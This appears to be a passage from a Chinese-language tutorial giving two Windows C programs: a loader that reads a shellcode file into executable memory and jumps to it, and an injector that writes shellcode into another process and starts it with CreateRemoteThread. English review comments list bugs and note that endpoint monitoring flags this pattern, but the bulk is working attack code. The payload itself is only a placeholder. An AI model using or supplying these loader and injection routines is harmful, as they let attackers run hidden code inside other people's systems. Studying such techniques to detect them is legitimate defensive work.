通过上方代码生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.

#include <stdio.h>
#include <Windows.h>

/*
 * Loader: reads c://shellcode.bin into a freshly allocated RWX page and
 * transfers control to it.
 *
 * Review notes (defects visible in this listing):
 *  - CreateFile's result is never compared with INVALID_HANDLE_VALUE; because
 *    OPEN_ALWAYS is used, a missing file is silently created empty, so fSize
 *    becomes 0 and the later VirtualAlloc/ReadFile operate on a zero-length
 *    buffer.
 *  - GetFileSize (INVALID_FILE_SIZE), VirtualAlloc (NULL) and ReadFile (FALSE)
 *    are unchecked; a failed allocation ends in a jump through a NULL pointer.
 *  - dwSize (bytes actually read) is never compared against fSize.
 *  - PAGE_EXECUTE_READWRITE maps the page writable and executable at once,
 *    which defeats the platform's W^X protections for this buffer.
 *  - The __asm block is MSVC x86-only (x64 MSVC has no inline asm), and the
 *    `int 3` placed after `ret` is unreachable.
 */
int main(int argc, char * argv[])
{
    HANDLE fp;
    unsigned char * fBuffer;
    DWORD fSize, dwSize;

    /* OPEN_ALWAYS creates the file when absent; no failure check follows. */
    fp = CreateFile(L"c://shellcode.bin", GENERIC_READ, FILE_SHARE_READ, NULL,
        OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

    fSize = GetFileSize(fp, 0);
    /* RWX allocation sized from the (unchecked) file size; never released. */
    fBuffer = (unsigned char *)VirtualAlloc(NULL, fSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    ReadFile(fp, fBuffer, fSize, &dwSize, 0);
    CloseHandle(fp);

    /* Control transfer: the buffer address is pushed and `ret` pops it into
     * EIP, so `return 0` below is only reached if the payload itself returns
     * to the pushed address -- which it does not. */
    __asm
    {
        mov eax,fBuffer
        push eax
        ret
        int 3
    }
    return 0;
}
ShellCode注入进程:

#include <stdio.h>
#include <windows.h>

/* Payload bytes; sizeof(ShellCode) counts the string literal's trailing NUL. */
unsigned char ShellCode[] = "shellcode代码";

/*
 * Copies ShellCode into the address space of process Pid and starts a remote
 * thread at the copied buffer.
 *
 * Review notes:
 *  - Declared BOOL but contains no return statement, so control falls off the
 *    end; any caller that reads the result gets an undefined value and cannot
 *    distinguish success from failure.
 *  - OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
 *    are all unchecked; a NULL Handle from OpenProcess (wrong PID, missing
 *    privilege, protected process) is passed straight to the next calls.
 *  - remoteThread is never closed (handle leak) and remoteBuffer is never
 *    freed in the target; only the process handle is closed.
 *  - Detection note: OpenProcess(PROCESS_ALL_ACCESS) followed by an RWX
 *    VirtualAllocEx, WriteProcessMemory and CreateRemoteThread into another
 *    process is the canonical remote-thread injection sequence that endpoint
 *    monitoring and EDR rules alert on.
 */
BOOL InjectShellCode(int Pid)
{
    HANDLE Handle, remoteThread;
    PVOID remoteBuffer;

    /* PROCESS_ALL_ACCESS is far broader than the rights actually used here. */
    Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);

    /* Remote RWX allocation; size includes the literal's NUL terminator. */
    remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);
    remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    CloseHandle(Handle);
    /* No return value: BOOL result is indeterminate. remoteThread is leaked. */
}


int main(int argc, char *argv[])
{
    /* Hard-coded PID; the (indeterminate) BOOL result is ignored. */
    InjectShellCode(1024);
    return 0;
}